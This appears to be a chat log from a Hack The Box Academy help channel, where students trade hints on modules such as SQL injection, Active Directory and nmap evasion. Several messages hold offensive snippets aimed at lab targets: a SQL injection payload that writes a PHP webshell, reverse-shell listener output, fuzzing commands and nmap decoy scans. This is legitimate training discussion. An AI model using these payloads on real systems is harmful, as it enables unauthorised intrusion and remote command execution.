#modules

1 messages · Page 2 of 1

rustic sage
#

This can't be how pentester spend their time on active directory. It should be about hacking it. Not whatever I had read/watch as the starting point.
For whatever reason, I can't seem to point how this is far worse and boring, than when I read about IT. Maybe I was expecting "hacking" on active directory soon. But I just can't bear to read/watch them.
These tutorials I saw in active directory, seem completely different from hours of hours in watching Linux, HTML5, basic web hacking, python3, and etc.

#

I... need to talk to a real pentester, bug hunter, or even a hacker. I need to get motive again. I know active directory is suppose to be a big deal, but I just can't see it. I tried. But I can't. What.. did I fail to see.

quiet prism
vital adder
#

@rustic sage try tryhackme throwback

rustic sage
vital adder
vital adder
rustic sage
rustic sage
#

I need to talk to a legit pentester about it.

vital adder
unreal patio
#

afaik AD is for pivoting

vital adder
rustic sage
quiet prism
rustic sage
quiet prism
vital adder
#

@rustic sage you complete 15 room on thm... really?

quiet prism
#

so the zap tutorial for the hud is super useful

#

still don't know why it's not loading my preconfigured browser though xD

uneven relic
#

Hi, I'm having trouble with the module on vulnerability assessment:
Specifically the task for nessus.
I configured the scan as described in the task, added the credentials and scanned. I got a report that looks good, but I cant answer any of the questions. E.g. it asks for a certain plugin, but that plugin is not in the report

quaint marsh
#

Where is the pop3 service from?

vital adder
oblique shale
# rustic sage But eventually I will face AD again soon enough. And I thought reading how to wr...

AD is just a dry subject on any front. Operation, defense and offensive. I am not sure what bells and whistles you expect from it but when you learn to use it in school it’s literally just massive 800 page textbooks. Also most of AD pentesting and defense is moving into very automated toolsets, so knowing the history is very useful. You have to remember HTB assumes you started learning on their platform.

obtuse saddle
#

I'm stuck on Web Reqest - GET module exercise .... I can't find the flag...pepehands any hints...

quaint marsh
slate palm
rustic sage
grave dust
#

can i dm you i have the same issue ?

oblique shale
# rustic sage So RL AD pentest & def are mostly automated? I did not know that. If u know a bl...

I mean you will need to look into vendors like rapid7 I know is a big one, Crowdstrike has some stuff too. I am not sure why you went in with a mindset of disliking the content, if you did not like it leave the owners a message on what could be improved. However as someone who has their CTT+ and has done trainings I would assume it stays this way because its a 80% coverage shot with their teaching style.

rustic sage
#

@oblique shale Its like reading "how to write a report". I know I will dislike it, but I'm still going to do it. However the AD basic "how to manual" teaching just doesn't make sense at all to hacking. We are suppose to break and make the system do stuffs it is not suppose too, not renaming objects, or other pointless things "as tasks".
Btw thank for the rapid7 & Crowstrike. Never heard of them before.

quaint marsh
#

or need download app XAMPP and connect?

oblique shale
vital adder
rustic sage
oblique shale
#

Ok so this may help you in your learning, their are three categories on the academy, their is General which is essentially IT skills, Defense (blue team) and then Offensive (red team), you are trying to take a learning module from the general category and shove it into expectations of "Hacking or pentesting" which is not at all what that module is for, why not give an offensive module with AD a go?

#

The general category is general security, IT, cyber not just pure hacking. I think that is maybe why you are upset.

rustic sage
#

Did u read that blog? Scroll down to the latter half.

oblique shale
#

The AD Track is an excellent resource for practice. Tracks are curated lists of machines and challenges that users can work on to master a particular topic. This track contains boxes of varying difficulties with various attack vectors. If you cannot yet solve these boxes on your own, you will still learn a lot by following a walkthrough or video. The more you are exposed to AD (and any topic), the more comfortable you will become, and eventually, things that right now may seem completely foreign will become second nature.

rustic sage
oblique shale
#

Probably safe to say trudge through the Microsoft essentials crap of the path then you will get into more offensive and educated learning

sage yew
#

Hey, can you maybe explain how to?|| I got a user and uploaded files to the site, but they dont execute when i try to run them :/|| 🙂

rustic sage
# vital adder that's the foundation

Not all foundation have a solid ground in RL job. I can see why they chose the name "Academy". In RL, most of it is not practical in job. For exa, a company did not give us a job to spend couple of minutes in manually calculating something repetitive every time doing the same task. Companies have software for that. So we will likely forget about it in the future, and wonder why we even bother learning it and must pass it in exam.

oblique shale
#

I do not agree with that statement I guess, there is value in learning those fundamentals, some deep level sys admins literally do that kind of stuff so it happens I guess I am just not sure what your expectation was of that course?

vital adder
rustic sage
oblique shale
#

I mean what is the flaw

knotty summit
#

I can't find the root submit flag

#

any idea

#

for Learn the basics
of Penetration Testing

sage yew
final frigate
#

With the Student suscription can I access my finished modules once it is finished?

west canopy
#

yes you can revisit any module you complete

final frigate
#

Thanks :)

west canopy
#

np 🙂

knotty summit
#

what is the root flag for the first level ? please

keen wave
#

Got it ,Thank you bro

grave dust
blissful verge
#

hi all, Happy Friday! just a quick update. the Learning Process module has 8 new sections by @drifting knoll

oblique shale
onyx dust
#

i have this command but it just hangs

#

in bloodhound it shows "addself" but idk how to convert that to ObjectAceType

#

what command can i run to see it

west canopy
#

@onyx dust DM me 🙂

vestal beacon
#

was tier 0 redeemer new? Haven't been here in a while.

#

I was sent back to tier 0 from tier 2 cos of it

west canopy
#

yea its pretty new

vestal beacon
#

ok thanks

#

But the nmap says host is up all ports are closed

daring geode
#

Has anyone done INFORMATION GATHERING - WEB EDITION
Page 7 Active Subdomain Enumeration

#

What is the FQDN of the IP address 10.10.34.136?

#

what am i missing here ?

#

nslookup -query=PTR <IP>. Does not work even when i use the name server ||ns.inlanefreight.htb||

#

dig -x 10.10.34.136 ||@ns.inlanefreight.htb|| also does not work

lethal atlas
#

look back at the part 2. Testing for ANY and AXFR Zone Transfer

#

you need to look at one of the subdomains

daring geode
#

Thanks

#

i'll re-read it

ebon vault
#

What is the name of the group that is present in the Company Data Share Permissions ACL by default?

hola alguien me podria ayudar con esto llevo casi todo un dia 😦

#

hello someone could help me with this I've been almost a whole day

still violet
#

can you give me hint on how to find upload directory ?? anyone else for file upload assessment ?

daring geode
#

Ahhh ! I figured it out

daring geode
#

2 zones here so......

#

Wow this is a good module

quiet cape
#

hello guys

#

Enumerate the hostname of your target and submit it as the answer. (case-sensitive)

#

hoe can i fine hostnames using nmap? if someone can guide me

unreal patio
#

nmap -sL

quiet cape
#

i used -A and it works but thx anyway

tight mesa
#

hello, anyone who has completed the Command Injection module..!!!

daring geode
#

I'm having issues with INFORMATION GATHERING - WEB EDITION Virtual Hosts:

My first step, I set up the following in a file called vhosts to make sure fuff is working before I load in a massive list

app
blog
dev-admin
forum
help
m
my
shop
some
stor
support
www

My second step I ran the following

 ┌─[scientist@Michaels-MacBook-Pro-2] - [~/hacking/wordlists/SecLists/Discovery/DNS] - [Fri Jul 29, 15:41]
└─[$] <git:(master*)> ffuf -w ./vhosts -u http://10.129.42.195 -H "HOST: FUZZ.inlanefreight.htb" -fs 612

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.42.195
 :: Wordlist         : FUZZ: ./vhosts
 :: Header           : Host: FUZZ.inlanefreight.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 612
________________________________________________

app                     [Status: 200, Size: 103, Words: 3, Lines: 6, Duration: 125ms]
:: Progress: [13/13] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:02] :: Errors: 12 ::

** Things to note: it found ||app.inlanefreight.htb ||I used curl to get flag2 **
** Questions: Why are there 12 errors. **

I went on to try a bigger list nothing showed up, even though app was one of the words in the list. So does this imply i'm using ffuf incorrectly, is this my ISP filtering things ? What am I doing wrong here.

Thanks.

daring geode
#

Figured it out

#

For those of you in the future that may have the same issue wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt --hc 400,404,403 -H "Host: FUZZ.inlanefreight.htb" -u http://10.***.***.*** -t 100

warm tapir
#

I'm working on NETWORK ENUMERATION WITH NMAP and need help with Firewall and IDS/IPS Evasion-easy lab. If anyone have any knowledge on this module, please pm me.

onyx dust
#

hello everyone. u know how some modules have hackthebox machines at the end of them? it looks like this (from broken authentication, for example)

#

are u supposed to do those machines at the end of the module? i haven't been but i was wondering if everyone else is

onyx dust
unique valve
daring geode
smoky steeple
#

Hi everyone, I am working on network enumeration with nmap / service enumeration. The question is "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.". I followed the lesson and tried tcpdump and nc in 2 separate tab. The tcpdump never show anything, but the nc show something like this: 220 HTB{xxxxxxxx}. I tried xxxxxxxx in the answer but it said wrong. Can anyone help me with this?

normal marsh
#

Include the HTB{}

#

not just what's inside

#

And don't forget to follow the instructions in the #welcome channel to verify your account and get more rooms opened up :-)

pure silo
#

Hey all I’m considering a student subscription when I manage to get some money together. It says instant access to everything up to tier 2, will I have to pay more money in order to have access to tier 3 material?

quiet prism
#

anyone? i've got two high risk vulns. one of them looks more promising than the other

analog kestrel
#

Hi guys, I need help in determining how to see if Telnet block login attempts for a set duration of time.

E.g Every 4 login attempts, the Microsoft Telnet server will deny all login attempts for about 5 seconds, before allowing incoming connections again

rustic sage
#

hello guys, i am at the skills assessment for SQL injection fundamentals, and i can't seem to get the webshell to print out the contents of /

#

cn' union select "",'<?php system(dir /); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell1.php'-- -

#

this is the command im using

#

pwd works

#

the above command also successfully executes, but then shell1.php is empty

#

could anyone please help ?

rustic sage
#

system($_GET[‘cmd’]) is more flexible. You can pass your command with the url parameter and dont need to upload a shell for each command

quiet prism
grave dust
quiet prism
quiet prism
#

it's the url encoding that's throwing me

#

i know i have to add something to the url it gives me

grave dust
rustic sage
quiet prism
#

but i don't see a flag.txt

grave dust
quiet prism
grave dust
quiet prism
#

i'm having a brain fart here

quiet prism
#

man i'm dumb

#

i encoded '/' as '%24' instead of '%2'

grave dust
#

well done XD

#

Hi everyone, I was wondering. I currently have the student subscription and I'm doing a lot of courses. Do I will still have access to all the courses I'm doing/have done ? thx

rustic sage
grave dust
rustic sage
#

Likely access will be gone by then

old cove
#

can someone guide me on this without spoiling

grave dust
grave dust
old cove
#

command inj

#

bypassing blacklisted characters

grave dust
#

u can dm if u want, but not sure i remember 🙂

quiet prism
#

i'm having a rough day. i've edited this html code to click this button 20+ times now and no flag 😢

quiet prism
#

i'm editing the html then sending to repeater but it's reverting back to disabled. send help

rustic sage
#

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell1.php'-- -%'' at line 1

#

double quotes did it

#

thanks!!

#

np!

pine vale
#

Just have to modify it once

quiet prism
#

yeah i'm REALLY unlucky... i did it a lOT

manic ermine
#

Does anyone have a nudge for me on the windows privesc skills assessment 1? I am trying to find the ldapadmin account credentials but have had no luck

quiet prism
#

GOT IT

grave dust
#

hi i'm doing File Upload Attacks and I was wondering why some file extensions like php2, php6 or pht does not work as webbshell and why are we seeing the source PHP code in the source code section of our web browser ? thx

worthy yoke
#

hi everyone , i am stuck at module Login Brute Forcing - Skills Assessment - Service Login , I tried but couldn't find the username & password ssh to the server , I need a hint about the username because I can't find it : ( , please help

final frigate
grave dust
final frigate
#

It just the server doesn't process as a php code, so it send it to you raw

grave dust
worthy yoke
grave dust
worthy yoke
#

Brute Forcing - Skills Assessment - Service Login

final frigate
worthy yoke
#

or a name to be able to run this tool

final frigate
#

In the skill assesment website you found a username

worthy yoke
#

username is user ?

grave dust
#

as an exemple

final frigate
#

to answer this question you must seen a username

#

if not, do first the website skill assesment

worthy yoke
final frigate
soft sedge
#

Hello friends, Has anyone completed challenge #3 of the network enumeration with nmap module where we want to "find out the the version of the running services. I believe it is port 50000 that is running the service ibm-db2. What I have tried so far is "sudo nmap 10.129.2.47 -f -Pn -n -p50000 -v -vv -sSU --source-port 53 -sV -D RND:5" pretty much throwing every evasion method I can, but I am still getting that it is tcpwrapped any help would be greatly appreciated it im 4 hrs in on this challenge.

final frigate
#

Can someone helps with File Upload Attacks the section of Type Filters?

summer lava
#

Please i need a command to filter this output... i only need the subdomains

sharp torrent
#

trying to connect to MSSQL via PowerUpSQL.ps1 getting a timeout in the Active directory enumeration and attack module

#

any idea what i'm doing wrong ? I tried on both the WIndows and Linux machine and I can connect properly. I know the creds are right because i can run commands like 'Select @@version' and get a response after a minute or two.

unreal timber
#

@sharp torrent hey can I dm you I need help in ACTIVE DIRECTORY ENUMERATION & ATTACKS module

distant stream
cosmic dirge
#

Hello, I need the help pls with John the ripper to find the hash from one zip file

summer lava
cosmic dirge
#

I think is something tricky

#

Yes but have a look to hint

vital adder
#

@cosmic dirge unzip the file Misc_hashes.zip the get the file hashcat.7z your task is to extract and crack the hash from that file not Misc_hashes.zip (also the tool is maybe broken)

cosmic dirge
#

I extract the hash

#

But is not in the correct format how they show to us

placid quest
#

@cosmic dirge use > to the new file

vital adder
cosmic dirge
#

So I have right

placid quest
#

@cosmic dirge use the command unzip Misc_hashes.zip

cosmic dirge
#

I done but the hash is long 1 km and is not the correct format

#

How they show

#

Don’t have this $pkzip$ on the front and end

vital adder
vital adder
rain marlin
#

GETTING STARTED in the Web Enumeration section there's this IP address that your instructed to go to " https://10.10.10.121/ " & " https://10.10.10.121/ private" neither of which take you anywhere other then "The connection has timed out" page I've refreshed the page and came back and keep getting the same issue. Can someone assist with the problem?#GETTING STARTED

west canopy
#

@rain marlin i think its just an example , i tested and get same result on my end

rain marlin
#

🤦🏾‍♂️ Thank you that makes sense;

west canopy
#

no worries 🙂

rain marlin
#

Have you completed this module?;

west canopy
#

yep

cosmic dirge
#

Oke …which tool I have to run

rain marlin
# west canopy yep

Could help guide me in the right direction with this part "Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag." I don't want answers just a little push I visit this IP and theres nothing there to log into

west canopy
rain marlin
#

👍🏾 Thanks

cosmic dirge
#

@rain marlin maybe need to add to /etc/hosts first

#

And after web fuzzing

steel kite
#

Could I please get a hint on which user/wordlist to use for the easy lab in the "Password Attacks" module? I've already tried default creds from ihebski's cheatsheet and other ones found in SecLists, also tried different permutations of the wordlist provided under resources and a few other wordlists with common usernames against both the services for a few days but not finding valid creds. Thanks!

ashen shuttle
#

@steel kite use the resources files of the module

steel kite
#

I did but found nothing, any permutation rules applied to the password list?

#

the custom rules gives out a 90k list which I brought down to something more manageable and im trying to run against the default username list from the module

ashen shuttle
#

Oh sorry, I haven't reach that question yet, was sure you're doing the network services at the beginning of the module.

steel kite
#

nope already done that, this is all about the user/pass wordlist used looks like and I'm going crazy 🤪

vale salmon
#

Looking for a bit of a nudge on the Firewall and IDS/IPS Evasion Medium Lab

delicate osprey
#

hello i do not find flag for DNS Attack on module ATTACKING COMMON SERVICES. some help ?

faint trout
#

Hello I am looking for help on the 'DNS Enumeration Using Python' module.

#

QUESTION: Perform a zone transfer using the DNS-AXFR.py script against your target for the "inlanefreight.htb" domain and submit the total number of unique subdomains found.

#

#!/usr/bin/env python3

Dependencies:

python3-dnspython

Used Modules:

import dns.zone as dz
import dns.query as dq
import dns.resolver as dr
import argparse

Initialize Resolver-Class from dns.resolver as "NS"

NS = dr.Resolver()

Target domain

Domain = 'inlanefreight.htb'

Set the nameservers that will be used

NS.nameservers = ['ns1.inlanefreight.htb', 'ns2.inlanefreight.htb']

List of found subdomains

Subdomains = []

Define the AXFR Function

def AXFR(domain, nameserver):

    # Try zone transfer for given domain and namerserver
    try:
            # Perform the zone transfer
            axfr = dz.from_xfr(dq.xfr(nameserver, domain))

            # If zone transfer was successful
            if axfr:
                    print('[*] Successful Zone Transfer from {}'.format(nameserver))

                    # Add found subdomains to global 'Subdomain' list
                    for record in axfr:
                            Subdomains.append('{}.{}'.format(record.to_text(), domain))

    # If zone transfer fails
    except Exception as error:
            print(error)
            pass

Main

if name=="main":

    # For each nameserver
    for nameserver in NS.nameservers:

            #Try AXFR
            AXFR(Domain, nameserver)

    # Print the results
    if Subdomains is not None:
            print('-------- Found Subdomains:')

            # Print each subdomain
            for subdomain in Subdomains:
                    print('{}'.format(subdomain))

    else:
            print('No subdomains found.')
            exit()
grave dust
#

hey guys i'm doing the broken auth module, brute force usernames and idk why i get the same output for all users for this question (the hidden input is always the user we tried)

faint trout
#

This is my edited code^

delicate osprey
faint trout
#

Am I missinng something in my code?

grave dust
#

what have u tried

delicate osprey
#

i brute force subdomain with gobuster with all Seclists/Discovery/DNS

#

i found some subdomain but no flag

#

zone transfert don't work

grave dust
delicate osprey
#

sure

manic ermine
faint trout
delicate osprey
rain marlin
leaden abyss
#

Stuck in the same place @vale salmon 🤷🏾‍♂️. I've found what looks to be the version. It's literally listed under version but, the answer I give is incorrect. I'm wondering if it's me or if it's a broken module 🤨

vale salmon
leaden abyss
#

@vale salmon I'm taking screenshots and opening a ticket. Sometimes the answer box is finicky. I don't know. I have to move on though. I've lost so much time to this module because of this.

vale salmon
#

Let me know if you hear something

leaden abyss
#

@vale salmon Just sent all my research in a ticket. I'll let you know how it goes

manic ermine
west canopy
#

@vale salmon nmap medium lab is weird. I just revisited it and used the exact same command as in my documentation but got a different result. I haven't been able to find a command that yields the flag.

vale salmon
#

Huh. That is weird.

grizzled cobalt
#

Disregard, I figured it out.

~~Is there a problem with Nibbles? I'm on the Initial Foothold section and I can't get my reverse shell to stay open. I've uploaded the php file to the target website and I've gone over the line of code within it multiple times to make sure it's correct. But when I open up a netcat listener on my machine and then try to establish the reverse shell, I get the following:

Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::54321
Ncat: Listening on 0.0.0.0:54321
Ncat: Connection from 10.129.8.210.
Ncat: Connection from 10.129.8.210:35348.
/bin/sh: 0: can't access tty; job control turned off
$

And then it just returns me to my normal input line.~~

pine dagger
hybrid flax
#

What would be the right channel to get help troubleshooting the error I'm running into trying to connect to the starting point vpn?

leaden abyss
#

@pine dagger Your response is redacted lol. Be careful not to give anyone exact answers. Judges are okay. I found something VERY strange while enumerating this target. I'll try that as my answer. If that IS the answer, I'll be kinda disappointed in HTB for being "off track" with their specific question and specific answer.

#

@hybrid flax click the help box when you're log into HTB. It'll give you article/discussion recommendations. If you're still stuck after that, you can submit a help ticket to tech support

#

@pine dagger Nudges* are okay. And you gave me a nudge. I'll have to try again when I get the chance and let you know how it turned out

dry tundra
#

What addressing mechanism is used at the Link Layer of the TCP/IP model? Did anybody get this answer under "Intro to Network Traffic Analysis" module? I tried "MAC addressing" but it isn't working

vale salmon
#

@pine dagger I've tried various scripts, to no avail. I thought for sure the ||dns-nsid|| script would work, but I'm not getting the flag and am unsure why.

rustic sage
#

need help: INFORMATION GATHERING - WEB EDITION
Information Gathering - Web - Skills Assessment

#

Perform active subdomain enumeration against the target githubapp.com. Which subdomain has the word 'elephants' in the name?

#

i downloaded and ran sublist3r found a bunch of sub domains but non with elephants in the name

#

anyone give me a nudge

unreal patio
#

@rustic sage Are you using the right nameserver?

rustic sage
unreal patio
#

You can also use -o file and then grep the file for elephants

rustic sage
proven kraken
#

HELLO EVERYONE

#

I WANNA LEARN HECKING

wind plaza
#

i can no find the right tamper to pass the sqlmap final assessment minishop

#

can anyone give me some hint?

#

keep getting syntax error

#

but i can figure out what was filter out

unreal patio
#

This question?

wind plaza
#

yes

#

i think i have already find which parameter to try

#

||id||

wind plaza
#

but dont know how to go further

unreal patio
#

@wind plaza Are you using burpsuit to capture packages?

#

There is a specific packet you have to capture to solve that exercise

wind plaza
#

yes

#

get it from shop

#

add to cart

unreal patio
#

Then sqlmap should tell you which settings to use

#

If you look at the end of the command running it'll tell you which tamper they suggest to use

#

That should be enough to get through 😐

wind plaza
#

ok, i'll tru it

#

try

#

btw, am i getting the right package

unreal patio
#

Yeah

#

It was either adding to cart (80% sure) or purchasing (20% likely)

livid pier
#

anyone around finish attacking common services?

balmy belfry
#

im a big noob, can someone explain what the backslash function is in this command? "smbclient \\10.129.1.12\WorkShares"

manic ermine
#

Anyone able to help on Windows Privilege Escalation assessment part 2? Everything tells me it should be vulnerable to an exploit that was run through in the course. I run the exploit in the same manner and with the same .exe used in the course (firefox related) and it seems to work, but I don't then have the required access to copy the malicious .exe.

acoustic owl
# balmy belfry im a big noob, can someone explain what the backslash function is in this comman...

A path is a string of characters used to uniquely identify a location in a directory structure. It is composed by following the directory tree hierarchy in which components, separated by a delimiting character, represent each directory. The delimiting character is most commonly the slash ("/"), the backslash character (""), or colon (":"), thou...

balmy belfry
wind plaza
#

still cant get the sqlmap final

#

i get different response on -v 6 when I use -d='{"id'=1'} and -r request.file

#

and I dont know why

#

-d will give me html of entire page, -r will give syntax error

pine dagger
feral stump
#

Hi fellows!
I’m tying to solve the Firewall and IDS/IPS Evasion - Medium Lab of Network enumeration where the challenge is to find the DNS server version

I have nmap and found filtered ports and opened ports

Can anyone help? Thx!

grave dust
#

alright then 😂

acoustic owl
feral stump
#

Perfect great! Thanks @acoustic owl

grave dust
#

I may need help on Broken auth, Predictable reset token. i think i got the thing but i'm doing something wrong

pine dagger
peak juniper
#

Hi one help needed in windows fundamental module
Skill Assessment Q.How to get the
SID of HR group

Already tried whoami /? GROUPS
But no luck. Not getting HR group name nor its SID

clear bough
#

hy man, i'm stuck in "Using Web Proxy" module on question "Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)". i do all the reverse hashing but got always the same size of the response.... can anyone help me please??

#

solved

pine dagger
#

Am really enjoying the labs atm. Tier 2 is definitely a lot more fun 🙂

lapis delta
#

@unique valve Hello, I currently have a student subscription. After finishing all the modules that are available to me, and after finishing my university ( I will no longer be a student ), will I get to keep the access to the modules or I won't be able to access the completed modules ?

leaden abyss
restive zephyr
#

Please, can someone help me with the File Inclusion Skills Assessment?

||I injected the php shell by log poisoning in the admin panel but it is not executing the commands||

plain coral
#

@drifting knoll FYI, Loved the OSINT: Corporate Recon Module, sadly Rapid7 are not currently approving requests from individual researchers or bug bounty participants to their Forward DNS datasets i.e. (FDNS)2022-07-30-1659149393-fdns_txt.json.gz 😦

main vapor
#

<@&861185840277487616>

#

There is a Rust scam above

pine dagger
autumn pilot
#

thank you

normal marsh
dire quest
undone cypress
#

Hi guys!

Skill Assessment - Broken Authentication from the "Broken Authentication" module.

  1. Selected users.
  2. Filtered passwords.
  3. Stuck, ((
    how to phase passwords bypassing Rate Limiting?
    Do you need a working script here?
    Or Burp forces can do it.
    ||The X-Forwarded-For substitution trick:||
    Unfortunately, it did not pass.(
    I will be glad of any advice.
    Thanks.
drifting knoll
grave dust
#

heay guys in "broken auth" in "bruteforceing cookie" i tampered the cookie by modifying the role (that i'm 99% sure it's the right one) but get this ?

vital adder
vital adder
grave dust
#

and what's strange is by just changing that or by changing the user too i get the same message

vital adder
#

can you dm the cookie that you use for this

grave dust
undone cypress
vital adder
undone cypress
#

what is its exact name in the options?

vital adder
bleak willow
#

someone solved the "Comparison Operators" part on the bash modules? idk what operator i should use and i been 3 days in it FeelsBadMan

west canopy
#

@bleak willow DM me 🙂

bleak willow
#

ty ❤️

undone cypress
#

@vital adder In, what you need, thank you!!!

obtuse saddle
#

God... I hate Active Directory ...pepehands Do I have to know this stuff...Kappa

fair mesa
#

Hello everyone hope you've spent a good week-end, I am currently stuck on the section "DNS" of "Footprinting module" and on the last question it is asked :
"What is the FQDN of the host where the last octet ends with "x.x.x.203"?", I took every hint on the forum and I am still stuck.

What I tried : I got both the main zone transfer and the subzone "internal" in a txt file

#

like here

#

and I tried to dig and dnsenum methodically but there is surely something I didn't get and I don't know what it is

violet axle
#

I'm having issues on the Bloodhound module with Sharphound giving different values for the quantity of users

#

I'm having a hard time connecting to the box in the first place with xfreerdp so I'm suspicious that the performance issues are impacting the Sharphound collection

west canopy
#

@fair mesa DM me 🙂

tiny ledge
#

Any Help with Web Attacks Skills Assessment, after finding the flag.php.log, I get the flag, but it seems to be the same as earlier assignment, and not working

grizzled cobalt
#

Nibbles - Privilege Escalation:

I can't get the reverse shell to pull in LinEnum.sh. I have it installed on my attacking machine, but for some reason when I try to pull it in through the reverse shell, I get the following:

Connecting to 10.10.15.227:8080... connected.
HTTP request sent, awaiting response... 404 File not found
2022-07-31 14:47:42 ERROR 404: File not found.

#

I'm thinking it maybe has something to do with where LinEnum was installed, but that's a really shaky theory and it's all I've been able to come up with.

woven copper
grizzled cobalt
#

wget http://<your ip>:8080/LinEnum.sh

#

I have my python server set up on my attacking machine, using port 8080

#

I don't understand what's going on. I installed LinEnum on my attacking machine, but for some reason the target can't find it to bring it back.

pine dagger
tiny ledge
#

Has Anyone Completed Web Attacks - Skills Assessment

final frigate
#

I spent half and hour doing the skills assesment of Server-Side attacks and the flag is right in front of you lemonthink

tiny ledge
#

Web Attacks Skills Assessment, why can I not enumerate users by changing the UID, what am I missing?

unique valve
vital adder
tiny ledge
dire quest
vital adder
#

@tiny ledge oh wait sorry i misread question that's not where you enum user UID

#

check in ||burp sitemap||

onyx dust
#

what is the longest module you've done so far? i'm doing active directory enumeration & attacks and so far it's the longest one

#

oh yes

onyx dust
onyx dust
vale salmon
onyx dust
#

powershell is so awful

#

active directory too. just as a system it's bad because it's too verbose and overly complex for no reason

#

i think that's what is making it take longer - the experience is unpleasant since the system is so boring awfully verbose and not in a good way.

#

section 28 of 36 and it seems 36 sections to a module is above average

#

even in the training it reflects the verbose nature of the bad system

leaden abyss
#

@vale salmon Support reviewed my research and screenshots. Turns out, I'm just wrong in my answer. I haven't checked if it's this weird flag I found while enumerating at a different point or not lol. That's probably what it is 🙄🤦🏾‍♂️😁

hollow thunder
#

Has anyone done shells & Payloads? The connection with nomachine keeps timing out. Any advice?

quasi wave
#

Would it be better to do the bug bounty path on Academy and then immediately start bug hunting or would you keep training on HTB until I am comfortable with easy and intermediate boxes in actual HTB VIP?

plain coral
# quasi wave Would it be better to do the bug bounty path on Academy and then immediately sta...

You can always do both, I'd personally pick a target and work your way through the path, and practice what you learn at the same time that way your actively practicing what you learn(paying attention to the scope of course) I'd keep training on HTB Academy no matter what, the content is invaluable whether your a beginner or experienced. In this field, there is always something to learn for everybodies skill set, and feeling uncomfortable is something that everyone feels, the most important/hardest thing is actually 'starting'.

quasi wave
#

Ok

#

Is bug bounty path enough to start bug hunting tho and start making decent money?

#

I’m doing THM and HTB Academy

#

Would doing Pentesterlab be worth it once I get past bug bounty path?

#

Or once I complete THM learning paths?

leaden abyss
#

@vale salmon @rigid sonnet@pine dagger I'm so pissed off that I couldn't get the flag simply because I wasn't using pwnbox. I've been enumerating for DAYS trying way too hard to finish this lab. I decided to try in pwnbox just to see and it took me 30 seconds to get the flag 🙄🙄🙄

vale salmon
#

Yep, that's exactly what happened to me, too

leaden abyss
#

@vale salmon I tried it after reading your comment about the same. What made you finally decide to try it in pwnbox?

vale salmon
west canopy
#

you all talking about nmap medium lab?

vale salmon
#

Yep

leaden abyss
#

@vale salmon Super uncommon for me too. My own Kali VM can get everything done 99% of the time and the other times I MUST go through pwnbox. It's annoying. And rare. But super annoying when in does happen.

#

@west canopy Yep

vale salmon
west canopy
#

i want to compare notes on medium lab , mind if i DM?

leaden abyss
#

@vale salmon I can't even get the Windows module to load properly. I guess I'll use pwnbox for that one too 😁

leaden abyss
#

@west canopy just type it out here 😉. That way ANYONE who can help can chime in

west canopy
#

its pretty spoilery though

#

i'm sitting on some juicy stuff

leaden abyss
#

@west canopy Damn. I don't know how to redact lol

manic ermine
# manic ermine Anyone able to help on Windows Privilege Escalation assessment part 2? Everythin...

🙏 🙏 Windows Priv Esc assessment 2 any help please 🙏 🙏

Ok - so as with the first assessment I ended up figuring it out after banging my head against a wall for many hours. Anyone in need of future help for skills assessment 2 feel free to reach out. I would say for answering Q2 you do need to execute an exploit explicitly walked through in the module, but pay very close attention to using full/absolute paths when doing the exploit and pay attention to x86 vs x64 differences.

blazing socket
#

And the IP is the proper one? Check with ifconfig. If you use vpn, the tun0 IP.

mossy epoch
#

hi, i'm in the same problem. Were you able to solve it?

plucky jungle
#

Hey guys does anybody of you finished Linux Privilege Escalation? I am Stuck at Flag 4. I found the credentials for the Tomcat login but don‘t know where to log in. I tried http://localhost:8080/manager/html but Firefox says that it is not possible to establish a connection to server. I don‘t get the possibility to enter credentials. Any Help is very welcome

dim yarrow
#

Can someone help me with the Footprinting module in the SMB section. I can’t get the answer to the question: What is the full system path of that specific share? I hope someone can help me with that.

smoky root
#

Hi, can you please tell me, what variable i should write out in "Tcpdump Fundamentals", question "Were absolute or relative sequence numbers used during the capture?"
"yes" and "no" doesn't apply

smoky root
broken warren
#

I could use some serious assistance on server side attacks ssti example exploitatin 2. I cant install tplmap because i get an error back saying pip is deprecated and i cant use it on the pwnbox either. i tried the command from the excercise ./tplmap.py -u 'http://ip:port/jointheteam' -d email=bleh but i get no such file or directory. i tried using locate tplmap.py and same thing just get an error. Or if someone could help me with setting up a tornado payload cause i have no idea what the documentation provided is trying to say.

pine dagger
rocky apex
#

how to know host name with nmap?

iron plaza
#

anyone completed the "Using the Metasploit Framework" module? needed to get some clarification on the following question: "Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer."

pine dagger
#

What clarification do you need?

iron plaza
#

If I dont add the -Pn flag then I get "Host seems down. If it is really up, but blocking our ping probes, try -Pn"

#

So how would I go about finding open ports for Windows server target

obtuse saddle
#

On Linux module: name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k? I typed "find / -type f -name *.conf -user root -size +25k -newermt 2020-03-03" I get a huge amount of files and Permission denied? What am I doing wrong? NotLikeThis & How to I exclude file over 28k? -exec command?

pine dagger
#

Was there a reason you were trying an ACK scan specifically?

iron plaza
iron plaza
iron plaza
obtuse saddle
#

htb-student is not in the sudoers file. This incident will be reported.😱 😂 LUL pepehands

iron plaza
obtuse saddle
#

I did add sudo and that's the reply I got🤣

iron plaza
#

which module you on?

signal raft
#

yo

obtuse saddle
signal raft
